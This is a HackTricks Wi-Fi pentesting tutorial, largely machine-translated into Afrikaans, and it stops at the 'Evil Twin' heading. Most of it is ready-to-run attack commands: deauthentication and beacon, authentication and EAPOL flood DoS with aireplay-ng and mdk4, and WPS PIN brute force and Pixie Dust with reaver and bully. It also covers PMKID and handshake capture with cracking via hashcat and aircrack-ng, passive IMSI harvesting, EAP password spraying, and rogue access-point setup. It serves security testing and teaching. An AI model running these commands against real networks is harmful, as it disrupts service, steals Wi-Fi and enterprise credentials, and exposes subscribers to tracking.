Pentesting Wifi

Reading time: 41 minutes

tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Wifi basiese kommandos

bash
ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Gereedskap

Hijacker & NexMon (Android interne Wi-Fi)

Enable Nexmon Monitor And Injection On Android

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

bash
mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Voer airgeddon uit met docker

bash
docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

Van: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

Dit kan Evil Twin-, KARMA- en Known Beacons-aanvalle uitvoer en vervolgens 'n phishing-sjabloon gebruik om die werklike netwerkwagwoord te bekom of sosiale netwerk credentials vas te vang.

bash
git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

Hierdie hulpmiddel outomatiseer WPS/WEP/WPA-PSK aanvalle. Dit sal outomaties:

  • Stel die interface in monitor mode
  • Skandeer vir moontlike netwerke - en laat jou die slagoffer(s) kies
  • As WEP - Begin WEP-aanvalle
  • As WPA-PSK
  • As WPS: Pixie dust attack en die bruteforce-aanval (wees versigtig, die brute-force aanval kan 'n lang tyd neem). Let wel dat dit nie null PIN of database/generated PINs probeer nie.
  • Probeer die PMKID vanaf die AP vasvang om dit te kraak
  • Probeer clients van die AP deauthenticate om 'n handshake vas te vang
  • As PMKID of Handshake, probeer bruteforce met top5000-wagwoorde.

Attacks Summary

  • DoS
  • Deauthentication/disassociation -- Ontkoppel almal (of 'n spesifieke ESSID/Client)
  • Random fake APs -- Versteek nets, moontlike crash scanners
  • Overload AP -- Probeer die AP uitskakel (gewoonlik nie baie nuttig nie)
  • WIDS -- Play with the IDS
  • TKIP, EAPOL -- Some specific attacks to DoS some APs
  • Cracking
  • Crack WEP (verskeie tools en metodes)
  • WPA-PSK
  • WPS pin "Brute-Force"
  • WPA PMKID bruteforce
  • [DoS +] WPA handshake capture + Cracking
  • WPA-MGT
  • Username capture
  • Bruteforce Credentials
  • Evil Twin (with or without DoS)
  • Open Evil Twin [+ DoS] -- Nuttig om captive portal creds te capture en/of LAN-aanvalle uit te voer
  • WPA-PSK Evil Twin -- Nuttig vir netwerkaanvalle as jy die wagwoord ken
  • WPA-MGT -- Nuttig om company credentials vas te vang
  • KARMA, MANA, Loud MANA, Known beacon
  • + Open -- Nuttig om captive portal creds te capture en/of LAN-aanvalle uit te voer
  • + WPA -- Nuttig om WPA handshakes te capture

DOS

Deauthentication Packets

Beskrywing vanaf here:.

Deauthentication attacks, 'n algemene metode in Wi-Fi hacking, behels die vervalsing van "management" frames om devices kragtig van 'n netwerk af te koppel. Hierdie onversleutelde pakkette mislei clients om te glo hulle kom van die wettige netwerk af, wat attackers in staat stel om WPA handshakes te versamel vir cracking-doeleindes of om netwerkverbindinge bestendig te ontwrig. Hierdie taktiek, alarmerend in sy eenvoud, word wyd gebruik en het groot implikasies vir netwerksekuriteit.

Deauthentication using Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0 beteken deauthentication
  • 1 is die aantal deauths om te stuur (jy kan verskeie stuur as jy wil); 0 beteken om hulle voortdurend te stuur
  • -a 00:14:6C:7E:40:80 is die MAC address van die access point
  • -c 00:0F:B5:34:30:30 is die MAC address van die kliënt om te deauthenticate; as dit weggelaat word word 'n broadcast deauthentication gestuur (werk nie altyd nie)
  • ath0 is die koppelvlaknaam

Disassociation Packets

Disassociation packets, soortgelyk aan deauthentication packets, is 'n tipe management frame wat in Wi-Fi-netwerke gebruik word. Hierdie pakkette dien om die verbinding tussen 'n toestel (soos 'n laptop of slimfoon) en 'n access point (AP) te verbreek. Die primêre onderskeid tussen disassociation en deauthentication lê in hul gebruiksituasies. Terwyl 'n AP deauthentication packets to remove rogue devices explicitly from the network, disassociation packets are typically sent when the AP is undergoing a shutdown, herstart, of verskuiwing, wat dus die ontkoppeling van alle gekoppelde nodes vereis.

Hierdie aanval kan uitgevoer word deur mdk4(mode "d"):

bash
# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

Meer DOS-aanvalle deur mdk4

In here.

ATTACK MODE b: Beacon Flooding

Stuur beacon frames om fake APs by clients te wys. Dit kan soms network scanners en selfs drivers laat crash!

bash
# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Deur authentication frames na alle toeganklike Access Points (APs) binne bereik te stuur, kan hierdie APs oorlaai word, veral wanneer talle kliënte betrokke is. Hierdie heftige verkeer kan tot stelselonstabiliteit lei, wat veroorsaak dat sommige APs vries of selfs herbegin.

bash
# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing Access Points (APs) kontroleer of 'n SSID behoorlik onthul word en bevestig die AP se bereik. Hierdie tegniek, saam met bruteforcing hidden SSIDs met of sonder 'n wordlist, help om weggesteekte netwerke te identifiseer en toegang daartoe te kry.

ATTACK MODE m: Michael Countermeasures Exploitation

Om ewekansige of duplikaat pakkette na verskillende QoS queues te stuur, kan Michael Countermeasures op TKIP APs aktiveer, wat lei tot 'n een minuut lange stillegging van die AP. Hierdie metode is 'n doeltreffende DoS (Denial of Service) aanvalstaktiek.

bash
# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Die oorlaai van 'n AP met EAPOL Start frames skep vals sessies, oorlaai die AP en blokkeer legitieme kliënte. Alternatiewelik, deur vals EAPOL Logoff messages in te spuit, word kliënte gedwing om te ontkoppel; beide metodes ontwrig effektief netwerkdiens.

bash
# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Aanvalle vir IEEE 802.11s mesh-netwerke

Verskeie aanvalle op skakelbestuur en roetering in mesh-netwerke.

ATTACK MODE w: WIDS-verwarring

Deur kliënte met verskeie WDS-nodes of vals rogue APs te kruis-koppel, kan mens Intrusion Detection and Prevention Systems manipuleer, wat verwarring en potensiële misbruik van die stelsel skep.

bash
# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

AANVALMODUS f: Packet Fuzzer

'n packet fuzzer met verskeie pakketbronne en 'n omvattende stel wysigers vir pakketmanipulasie.

Airggedon

Airgeddon bied die meeste van die aanvalle wat in die vorige opmerkings voorgestel is:

WPS

WPS (Wi-Fi Protected Setup) vereenvoudig die proses om toestelle aan 'n router te koppel, en verhoog die instelspoed en gemak vir netwerke wat met WPA of WPA2 Personal geïnkripteer is. Dit is ondoeltreffend teen die maklik gekompromitteerde WEP-sekuriteit. WPS gebruik 'n 8-syfer PIN, geverifieer in twee helftes, wat dit vatbaar maak vir brute-force-aanvalle weens die beperkte aantal kombinasies (ongeveer 11 000 moontlikhede).

WPS Bruteforce

Daar is 2 hoof gereedskap om hierdie aksie uit te voer: Reaver en Bully.

  • Reaver is ontwerp as 'n robuuste en praktiese aanval teen WPS, en is getoets teen 'n wye verskeidenheid toegangspunte en WPS-implementasies.
  • Bully is 'n nuwe implementering van die WPS brute force-aanval, geskryf in C. Dit het verskeie voordele bo die oorspronklike reaver code: minder afhanklikhede, verbeterde geheue- en CPU-prestasie, korrekte hantering van endianness, en 'n meer robuuste stel opsies.

Die aanval benut die WPS PIN se kwesbaarheid, veral die blootstelling van die eerste vier syfers en die laaste syfer se rol as 'n kontrolesom, wat die brute-force-aanval vergemaklik. Verdedigings teen brute-force-aanvalle, soos die blocking MAC addresses van aggressiewe aanvallers, vereis egter MAC address rotation om die aanval voort te sit.

Sodra die WPS PIN bekom is met gereedskap soos Bully of Reaver, kan die aanvaller die WPA/WPA2 PSK aflei, wat permanente netwerktoegang verseker.

bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

Hierdie verfynde benadering mik op WPS PINs deur bekende kwesbaarhede:

  1. Pre-discovered PINs: Gebruik 'n databasis van bekende PINs wat gekoppel is aan spesifieke vervaardigers wat bekend is daarvoor dat hulle uniforme WPS PINs gebruik. Hierdie databasis korreleer die eerste drie oktette van die MAC-addresses met waarskynlike PINs vir hierdie vervaardigers.
  2. PIN Generation Algorithms: Benut algoritmes soos ComputePIN en EasyBox, wat WPS PINs bereken gebaseer op die AP se MAC-address. Die Arcadyan-algoritme vereis bykomend 'n device ID, wat 'n ekstra laag by die PIN-genereringsproses voeg.

WPS Pixie Dust attack

Dominique Bongard het 'n fout ontdek in sommige Access Points (APs) wat verband hou met die skep van geheime kodes, bekend as nonces (E-S1 en E-S2). As hierdie nonces bepaal kan word, raak dit maklik om die AP se WPS PIN te kraak. Die AP openbaar die PIN binne 'n spesiale kode (hash) om te bewys dat dit legitiem is en nie 'n fake (rogue) AP nie. Hierdie nonces is in wese die "sleutels" tot die "kluis" wat die WPS PIN bevat. Meer hieroor is te vinde here.

Eenvoudig gestel, die probleem is dat sommige APs nie voldoende ewekansige sleutels gebruik het om die PIN tydens die konneksieproses te enkripteer nie. Dit maak die PIN kwesbaar om van buite die netwerk geraai te word (offline brute force attack).

bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

As jy nie die toestel na monitor-modus wil omskakel nie, of as reaver en bully probleme ondervind, kan jy OneShot-C probeer. Hierdie hulpmiddel kan 'n Pixie Dust attack uitvoer sonder om na monitor-modus oor te skakel.

bash
./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Sommige swak ontwerpte stelsels laat selfs 'n Null PIN (ʼn leë of nie-bestaande PIN) toegang verleen, wat nogal ongewoon is. Die hulpmiddel Reaver kan hierdie kwesbaarheid toets, in teenstelling met Bully.

bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

Al die voorgestelde WPS-aanvalle kan maklik uitgevoer word met airgeddon.

  • 5 en 6 laat jou probeer jou eie PIN (as jy een het)
  • 7 en 8 voer die Pixie Dust attack uit
  • 13 laat jou die NULL PIN toets
  • 11 en 12 sal die PINs wat met die gekose AP verband hou uit beskikbare databasisse herontgin en genereer moontlike PINs met behulp van: ComputePIN, EasyBox en opsioneel Arcadyan (aanbeveel, hoekom nie?)
  • 9 en 10 sal elke moontlike PIN toets

WEP

Dit is deesdae baie gebreek en nie meer in gebruik nie. Wees net bewus dat airgeddon 'n WEP-opsie het wat "All-in-One" genoem word om hierdie tipe beskerming aan te val. Meer tools bied soortgelyke opsies.

WPA/WPA2 PSK

PMKID

In 2018 het hashcat revealed 'n nuwe aanvalmetode bekendgemaak, uniek omdat dit slegs one single packet benodig en nie vereis dat enige kliënte aan die teiken-AP gekoppel is nie — net interaksie tussen die aanvaller en die AP.

Many modern routers add an optional field to the first EAPOL frame during association, known as Robust Security Network. This includes the PMKID.

bash
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Aangesien die "PMK Name" konstant is, en ons die BSSID van die AP en die station ken, en die PMK identies is met dié van 'n volledige 4-way handshake, kan hashcat hierdie inligting gebruik om die PSK te kraak en die passphrase terug te kry!

Om hierdie inligting te insamel en plaaslik die wagwoord te bruteforce, kan jy die volgende doen:

bash
airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
bash
#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

Die PMKIDs captured sal in die console gewys word en ook saved binne _ /tmp/attack.pcap_
Skakel nou die capture om na hashcat/john formaat en kraak dit:

bash
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Neem asseblief kennis dat die formaat van 'n korrekte hash uit 4 dele bestaan, soos: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 As joune slegs 3 dele bevat, is dit ongeldig (die PMKID capture was nie geldig nie).

Let wel dat hcxdumptool also capture handshakes (iets soos dit sal verskyn: MP:M1M2 RC:63258 EAPOLTIME:17091). Jy kan die handshakes na hashcat/john formaat transformeer met cap2hccapx

bash
tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Ek het opgemerk dat sommige handshakes wat met hierdie tool vasgelê is, nie gekraak kon word selfs al was die korrekte password bekend nie. Ek beveel aan om, indien moontlik, handshakes ook op die tradisionele wyse vas te lê, of verskeie daarvan met hierdie tool te vang.

Handshake vaslegging

'n Aanval op WPA/WPA2 netwerke kan uitgevoer word deur 'n handshake vas te lê en te probeer om die password offline te crack. Hierdie proses behels die monitering van die kommunikasie van 'n spesifieke netwerk en BSSID op 'n bepaalde channel. Hier is 'n vereenvoudigde gids:

  1. Identifiseer die BSSID, channel, en 'n connected client van die teiken-netwerk.
  2. Gebruik airodump-ng om die netwerkverkeer op die gespesifiseerde channel en BSSID te monitor, in die hoop om 'n handshake vas te lê. Die opdrag sal soos volg lyk:
bash
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
  1. Om die kans te vergroot om 'n handshake vas te vang, koppel die kliënt kortliks van die netwerk af om 'n re-authentication af te dwing. Dit kan gedoen word met die aireplay-ng opdrag, wat deauthentication packets na die kliënt stuur:
bash
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Note that as the client was deauthenticated it could try to connect to a different AP or, in other cases, to a different network.

Sodra in die airodump-ng enige handshake-inligting verskyn, beteken dit dat die handshake captured is en jy kan ophou luister:

Sodra die handshake captured is, kan jy dit crack met aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Kontroleer of daar 'n handshake in die lêer is

aircrack

bash
aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

bash
tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

As hierdie hulpmiddel 'n onvoltooide handshake van 'n ESSID vind voordat die voltooide een gevind is, sal dit nie die geldige een opspoor nie.

pyrit

bash
apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

In enterprise WiFi-opstellings, sal jy verskeie outentiseringsmetodes teëkom, wat elkeen verskillende sekuriteitsvlakke en bestuursfunksies bied. Wanneer jy tools soos airodump-ng gebruik om netwerkverkeer te ondersoek, mag jy identifiseerders vir hierdie outentiseringstipes opmerk. Sommige algemene metodes sluit in:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi
  1. EAP-GTC (Generic Token Card):
  • Hierdie metode ondersteun hardware tokens en eenmalige wagwoorde binne EAP-PEAP. Anders as MSCHAPv2, gebruik dit nie 'n peer challenge nie en stuur wagwoorde in plattetekst na die toegangspunt, wat 'n risiko vir downgrade attacks inhou.
  1. EAP-MD5 (Message Digest 5):
  • Betrek die stuur van die MD5-hash van die wagwoord vanaf die kliënt. Dit word nie aanbeveel weens kwesbaarheid vir woordeboekaanvalle, gebrek aan bedienerverifikasie, en onvermoë om sessiespesifieke WEP-sleutels te genereer.
  1. EAP-TLS (Transport Layer Security):
  • Gebruik beide kliënt- en bedienersertifikate vir verifikasie en kan dinamies gebruiker- en sessie-gebaseerde WEP-sleutels genereer om kommunikasie te beveilig.
  1. EAP-TTLS (Tunneled Transport Layer Security):
  • Verskaf wedersydse verifikasie deur 'n enkripsie-tunnel, tesame met 'n metode om dinamiese, per-gebruiker, per-sessie WEP-sleutels af te lei. Dit vereis slegs bediener-side sertifikate, met kliënte wat geloofsbriewe gebruik.
  1. PEAP (Protected Extensible Authentication Protocol):
  • Werk soortgelyk aan EAP deur 'n TLS-tunnel te skep vir beskermde kommunikasie. Dit laat toe dat swakker verifikasieprotokolle bo-op EAP gebruik word as gevolg van die beskerming wat die tunnel bied.
  • PEAP-MSCHAPv2: Gereeld na verwys as PEAP, dit kombineer die kwesbare MSCHAPv2 challenge/response-meganisme met 'n beskermende TLS-tunnel.
  • PEAP-EAP-TLS (or PEAP-TLS): Soortgelyk aan EAP-TLS maar inisieer 'n TLS-tunnel voordat sertifikate uitgeruil word, wat 'n addisionele laag van sekuriteit bied.

You can find more information about these authentication methods here and here.

Gebruikersnaamvaslegging

Reading https://tools.ietf.org/html/rfc3748#page-27 dit lyk of jy EAP gebruik die "Identity" messages moet supported wees, en die username gaan in clear gestuur word in die "Response Identity" boodskappe.

Selfs al gebruik jy een van die mees veilige verifikasiemetodes: PEAP-EAP-TLS, is dit moontlik om die username sent in the EAP protocol te capture. Om dit te doen, capture a authentication communication (begin airodump-ng binne 'n kanaal en wireshark op dieselfde koppelvlak) en filtreer die pakkette met eapol.
Binne die "Response, Identity" pakket sal die username van die kliënt verskyn.

Anonieme identiteite

Identity hiding word deur beide EAP-PEAP en EAP-TTLS ondersteun. In die konteks van 'n WiFi-netwerk word 'n EAP-Identity versoek tipies deur die access point (AP) geïnisieer tydens die association-proses. Om die beskerming van gebruikersanomimiteit te verseker, bevat die reaksie van die EAP-kliënt op die gebruiker se toestel slegs die noodsaaklike inligting wat die aanvanklike RADIUS-bediener benodig om die versoek te verwerk. Hierdie konsep word geïllustreer deur die volgende scenario's:

  • EAP-Identity = anonymous
  • In hierdie scenario gebruik alle gebruikers die pseudonieme "anonymous" as hul gebruiker-id. Die aanvanklike RADIUS-bediener funksioneer as óf 'n EAP-PEAP óf EAP-TTLS bediener, verantwoordelik vir die bestuur van die bediener-side van die PEAP of TTLS-protokol. Die inner (protected) authentication method word dan óf plaaslik hanteer óf gedelegeer na 'n afstand (home) RADIUS-bediener.
  • EAP-Identity = anonymous@realm_x
  • In hierdie situasie verberg gebruikers van verskillende realms hul identiteit terwyl hulle hul onderskeie realms aandui. Dit laat die aanvanklike RADIUS-bediener toe om die EAP-PEAP of EAP-TTLS versoeke aan RADIUS-bedieners in hul home realms te proxy, wat as die PEAP of TTLS bediener optree. Die aanvanklike RADIUS-bediener funksioneer uitsluitlik as 'n RADIUS-relay node.
  • Alternatiewelik mag die aanvanklike RADIUS-bediener dien as die EAP-PEAP of EAP-TTLS bediener en óf die protected authentication method hanteer óf dit na 'n ander bediener deurstuur. Hierdie opsie fasiliteer die konfigurasie van onderskeibare beleide vir verskillende realms.

In EAP-PEAP, sodra die TLS-tunnel tussen die PEAP-bediener en die PEAP-kliënt gevestig is, inisieer die PEAP-bediener 'n EAP-Identity versoek en stuur dit deur die TLS-tunnel. Die kliënt antwoord op hierdie tweede EAP-Identity versoek deur 'n EAP-Identity reaksie te stuur wat die gebruiker se werklike identiteit deur die enkripsie-tunnel bevat. Hierdie benadering voorkom effektief dat die gebruiker se werklike identiteit deur enigiemand wat die 802.11-verkeer afluister, onthul word.

EAP-TTLS volg 'n effens ander prosedure. Met EAP-TTLS verifieer die kliënt tipies deur PAP of CHAP, beveilig deur die TLS-tunnel. In hierdie geval sluit die kliënt 'n User-Name attribuut en óf 'n Password óf CHAP-Password attribuut in die aanvanklike TLS-boodskap in wat na tunneldigheid gestuur word.

Ongeag die gekose protokol, verkry die PEAP/TTLS-bediener kennis van die gebruiker se werklike identiteit nadat die TLS-tunnel gevestig is. Die werklike identiteit kan voorgestel word as user@realm of bloot user. As die PEAP/TTLS-bediener ook verantwoordelik is vir die verifikasie van die gebruiker, besit dit nou die gebruiker se identiteit en gaan voort met die verifikasiemetode wat deur die TLS-tunnel beskerm word. Alternatiewelik mag die PEAP/TTLS-bediener 'n nuwe RADIUS-versoek na die gebruiker se home RADIUS-bediener stuur. Hierdie nuwe RADIUS-versoek laat die PEAP of TTLS protokollaag uit. In gevalle waar die protected authentication method EAP is, word die inner EAP-boodskappe na die home RADIUS-bediener gestuur sonder die EAP-PEAP of EAP-TTLS wrapper. Die User-Name attribuut van die uitgaande RADIUS-boodskap bevat die gebruiker se werklike identiteit, wat die anonieme User-Name van die inkomende RADIUS-versoek vervang. Wanneer die protected authentication method PAP of CHAP is (slegs deur TTLS ondersteun), word die User-Name en ander verifikasie-attribuite wat uit die TLS-lading onttrek is, in die uitgaande RADIUS-boodskap ingestel, en vervang die anonieme User-Name en TTLS EAP-Message attribuite wat in die inkomende RADIUS-versoek gevind is.

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.

Where the leak happens (high level):

  • 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
  • Authenticator sends EAP-Request/Identity.
  • Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
  • Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
  • Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

Click to expand
bash
# 1) Enable monitor mode
airmon-ng start wlan0

# 2) Optional: lock channel to the target BSS
airodump-ng wlan0mon --essid <SSID>

# 3) Capture 802.1X/EAP frames
# Wireshark display filters:
#   eap || eapol
#   (identity specifically): eap.code == 2 && eap.type == 1
# Kismet: add source wlan0mon; enable 802.1X/EAP views
# tcpdump (pcap capture):
#   tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap

# 4) Wait for a device to auto-connect to the SSID
# 5) Inspect the first EAP-Response/Identity frame
# Expected: ASCII NAI containing IMSI, e.g.
#   20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org

Aantekeninge:

  • Werk voor enige TLS-tunnel as die implementering kaal EAP‑SIM/AKA gebruik sonder beskermde identiteit/pseudonieme.
  • Die blootgestelde waarde is 'n permanente identifiseerder wat aan die intekenaar se SIM gekoppel is; versameling daarvan maak langtermyn-opsporing en verdere telecom-misbruik moontlik.

Impak

  • Privaatheid: volgehoue gebruiker-/toestelopsporing deur passiewe Wi‑Fi-opnames in openbare plekke.
  • Aanloop vir telecom-misbruik: met die IMSI kan 'n aanvaller met SS7/Diameter-toegang ligging navraag doen of probeer oproep-/SMS-afluistering en MFA-diefstal bewerkstellig.

Mitigeringe / waarna om te kyk

  • Verifieer dat kliënte anonieme outer identities (pseudonieme) vir EAP‑SIM/AKA gebruik volgens 3GPP-riglyne (bv. 3GPP TS 33.402).
  • Gee voorkeur aan tunneling van die identity phase (bv. EAP‑TTLS/PEAP wat inner EAP‑SIM/AKA dra) sodat die IMSI nooit in duidelike teks gestuur word nie.
  • Pakketvasleggings van association/auth mag nooit 'n rou IMSI in EAP-Response/Identity openbaar nie.

Related: Telecom signalling exploitation with captured mobile identifiers Telecom Network Exploitation

EAP-Bruteforce (password spray)

If the client is expected to use a username and password (notice that EAP-TLS won't be valid in this case), then you could try to get a list a usernames (see next part) and passwords and try to bruteforce the access using air-hammer.

bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

Jy kan hierdie aanval ook met eaphammer uitvoer:

bash
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt

Kliëntaanvalle Teorie

Netwerkkeuse en Roaming

  • Die 802.11-protokol definieer hoe 'n stasie by 'n Extended Service Set (ESS) aansluit, maar spesifiseer nie die kriteria vir die keuse van 'n ESS of 'n access point (AP) binne dit nie.
  • Stasies kan tussen APs roam wat dieselfde ESSID deel, en sodoende konnektiwiteit oor 'n gebou of area behou.
  • Die protokol vereis stasie-verifikasie tot die ESS, maar vereis nie dat die AP aan die stasie verifieer nie.

Voorkeurnetwerklyste (PNLs)

  • Stasies stoor die ESSID van elke draadlose netwerk waarop hulle aansluit in hul Preferred Network List (PNL), tesame met netwerk-spesifieke konfigurasiedetails.
  • Die PNL word gebruik om outomaties aan bekende netwerke te koppel, wat die gebruiker se ervaring verbeter deur die verbindingsproses te stroomlyn.

Passiewe skandering

  • APs stuur periodiek beacon frames uit wat hul teenwoordigheid en funksies aankondig, insluitende die AP se ESSID tensy uitsaaiing gedeaktiveer is.
  • Gedurende passiewe skandering luister stasies vir beacon frames. As 'n beacon se ESSID ooreenstem met 'n invoer in die stasie se PNL, kan die stasie outomaties aan daardie AP koppel.
  • Kennis van 'n toestel se PNL maak potensiële uitbuiting moontlik deur 'n bekende netwerk se ESSID na te boots en die toestel te mislei om aan 'n kwaadwillige AP te koppel.

Aktiewe probe

  • Aktiewe probing behels dat stasies probe requests stuur om nabygeleë APs en hul eienskappe te ontdek.
  • Gerigde probe requests mik op 'n spesifieke ESSID en help om te bepaal of 'n bepaalde netwerk binne omvang is, selfs al is dit 'n verborge netwerk.
  • Uitsaai probe requests het 'n null SSID-veld en word na alle nabygeleë APs gestuur, waardeur die stasie kan nagaan of enige voorkeurnetwerk beskikbaar is sonder om die inhoud van sy PNL bekend te maak.

Eenvoudige AP met herleiding na Internet

Voordat daar verduidelik word hoe om meer komplekse aanvalle uit te voer, gaan dit verduidelik word hoe om net 'n AP te skep en sy verkeer na 'n koppelvlak wat aan die Internet gekoppel is te herlei.

Gebruik ifconfig -a om te kontroleer dat die wlan-koppelvlak om die AP te skep en die koppelvlak wat aan die Internet verbind is, teenwoordig is.

DHCP & DNS

bash
apt-get install dnsmasq #Manages DHCP and DNS

Skep die konfigurasielêer /etc/dnsmasq.conf:

ini
interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1

Dan stel IPs en routes:

bash
ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

En dan begin dnsmasq:

bash
dnsmasq -C dnsmasq.conf -d

hostapd

bash
apt-get install hostapd

Skep 'n konfigurasielêer hostapd.conf:

ini
interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

Stop irriterende prosesse , stel monitor mode, en begin hostapd:

bash
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf

Deurstuur en omleiding

bash
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Evil Twin

